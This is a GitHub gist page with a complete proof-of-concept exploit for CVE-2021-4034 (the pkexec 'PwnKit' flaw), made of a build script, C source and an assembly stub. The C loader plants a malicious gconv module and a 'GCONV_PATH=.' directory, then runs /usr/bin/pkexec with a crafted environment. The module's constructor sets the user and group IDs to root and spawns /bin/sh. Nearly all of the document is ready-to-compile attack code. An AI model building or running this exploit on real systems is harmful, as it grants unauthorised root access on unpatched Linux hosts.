Last active
July 14, 2024 13:28
-
-
Save smx-smx/2459c214e12d7d6006eda89b75b9a9ea to your computer and use it in GitHub Desktop.
CVE-2021-4034 (pkexec) self contained exploit PoC
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2021-4034 (pkexec) self contained exploit PoC |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
gcc pwnkit.c -shared -o pwnkit.so | |
strip -s pwnkit.so | |
gcc -DLOADER pwnkit.c pwnkit.S -o pwnkit | |
strip -s pwnkit | |
rm pwnkit.so |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* @file pwnkit.c | |
* @author Smx (smxdev4@gmail.com) | |
* @brief | |
* CVE-2021-4034 (pkexec) self contained exploit PoC | |
* Implementation of the Qualys paper | |
* @version 0.1 | |
* @date 2022-01-26 | |
* @copyright Copyright (c) 2022 | |
*/ | |
#define _GNU_SOURCE | |
#include <stdio.h> | |
#include <stdint.h> | |
#include <unistd.h> | |
#include <libgen.h> | |
#include <linux/limits.h> | |
#include <fcntl.h> | |
#include <sys/stat.h> | |
#include <sys/wait.h> | |
#include <spawn.h> | |
int gconv (void *step, | |
void *data, | |
const unsigned char **inptrp, | |
const unsigned char *inend, | |
unsigned char **outbufstart, size_t *irreversible, | |
int do_flush, int consume_incomplete) | |
{ | |
return 4; | |
} | |
int gconv_init (void *ignored){ return 0; } | |
int gconv_end (void *ignored){ return 0; } | |
#define TARGET_VAR "GCONV_PATH" | |
#define TARGET_PREFIX "gconv" | |
#define TARGET_MODULE "pwnkit" | |
#define TARGET_CHARSET "PWNKIT" | |
#ifndef LOADER | |
__attribute__((constructor)) | |
void ctor(){ | |
puts("-----------------"); | |
puts("-- Smx says hi --"); | |
puts("-----------------"); | |
setresuid(0, 0, 0); | |
setresgid(0, 0, 0); | |
char *argv[] = {"/bin/sh", NULL}; | |
char *envp[] = {"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL}; | |
pid_t pid = 0; | |
posix_spawn(&pid, "/bin/sh", | |
NULL, NULL, | |
argv, envp | |
); | |
int status = 0; | |
waitpid(pid, &status, 0); | |
unlink(TARGET_PREFIX"/"TARGET_MODULE".so"); | |
unlink(TARGET_VAR"=./"TARGET_PREFIX); | |
unlink(TARGET_PREFIX"/gconv-modules"); | |
rmdir(TARGET_VAR"=."); | |
rmdir(TARGET_PREFIX); | |
} | |
#endif | |
#ifdef LOADER | |
extern void *blob_start; | |
extern void *blob_end; | |
int main(int argc, char *argv[]){ | |
char buf[PATH_MAX]; | |
readlink("/proc/self/exe", buf, sizeof(buf)); | |
char *dir = dirname(buf); | |
chdir(dir); | |
int fd; | |
// write env trigger | |
mkdir(TARGET_VAR"=.", 0755); | |
// write prefix | |
mkdir(TARGET_PREFIX, 0755); | |
fd = open(TARGET_PREFIX"/"TARGET_MODULE".so", O_CREAT | O_WRONLY | O_TRUNC, (mode_t)0777); | |
write(fd, &blob_start, (uintptr_t)&blob_end - (uintptr_t)&blob_start); | |
fd = open(TARGET_VAR"=./"TARGET_PREFIX, O_CREAT | O_WRONLY | O_TRUNC, (mode_t)0777); | |
close(fd); | |
// write module config | |
char conf[] = | |
"module "TARGET_CHARSET"// INTERNAL "TARGET_MODULE" 1\n" | |
"module INTERNAL "TARGET_CHARSET"// "TARGET_MODULE" 1\n" | |
; | |
fd = open(TARGET_PREFIX"/gconv-modules", O_CREAT | O_WRONLY | O_TRUNC, (mode_t)0777); | |
write(fd, conf, sizeof(conf) -1 ); | |
close(fd); | |
char *args[] = {NULL}; | |
char *env[] = { | |
TARGET_PREFIX, | |
"PATH="TARGET_VAR"=.", | |
"CHARSET="TARGET_CHARSET, | |
"XAUTHORITY=../", | |
NULL | |
}; | |
execve("/usr/bin/pkexec", args, env); | |
return 0; | |
} | |
#endif |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
.section .data | |
.globl blob_start | |
.globl blob_end | |
blob_start: | |
.incbin "pwnkit.so" | |
blob_end: |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment